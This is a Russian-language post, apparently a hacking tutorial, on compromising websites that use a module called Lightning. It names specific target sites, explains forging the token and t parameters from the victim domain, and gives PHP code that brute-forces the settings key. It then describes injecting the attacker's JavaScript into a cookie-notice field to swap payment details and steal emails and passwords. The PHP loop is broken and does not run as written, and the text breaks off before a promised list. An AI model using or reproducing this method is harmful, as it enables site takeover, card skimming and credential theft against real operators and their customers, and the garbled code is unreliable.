Lightning - когда же наконец-то удалят?

Сегодня я вас научу третьему способу взлома сайтов через говномодуль Lightning.

Переходим на сайт с этим "модулем" по ссылке https://mi-krsk.ru/index.php?li_op=t&op=v и узнаём версию модуля. Если версия модуля ниже 4.30, то можно попробовать внести изменения без поиска ключа.

Для взлома без ключа нам нужно перейти по ссылке https://lightning.devs.mx/settings4.php?token=&t=&key=

в параметр token подставить результат md5('https://town-shop.net/')

в параметр t подставить результат base64_encode('town-shop.net')

Если без ключа не получилось, то необходимо для параметра key подобрать ключ.

Ключ подбирается следующим образом. Сначала прогоняем от миллиарда и если вдруг не нашло, тогда первый миллиард т.к. в основном генерирует модуль цифру из 9-10 чисел.

	if (!empty($_SERVER['HTTP_USER_AGENT'])) {
		$user_agent = $_SERVER['HTTP_USER_AGENT'];
	} else {
		$user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36';
	}

	$context  = stream_context_create(array('http' =>
		array(
			'method'  => 'GET',
			'header'  => "Content-Type: application/x-www-form-urlencoded\r\n" . "Referer: /\r\n" . "User-Agent: " . $user_agent,
		)
	));

	foreach (1000000000 as 2150000000) {
		$sha1 = sha1(sha1($rand));

		if (file_get_contents('https://town-shop.net/?li_op=n&op=test&id=&key=' . $sha1, false, $context) == 'OK') {
			file_put_contents(__DIR__ . '/' . $sha1, false);
			exit('Ключ обнаружен! ' . $sha1);
		}
	}

Да долго, поэтому нужно это делать на серверах или иметь 10 компьютеров. Зато потом можно подменять на сайте жертвы платёжные данные, собирать почту, пароли и т.д. Это всё делается при сохранении настроек и вводе своего js скрипта в поле для вывода сообщения о соглашении использования куков.

Вот ещё, держите небольшой списочек для пробы: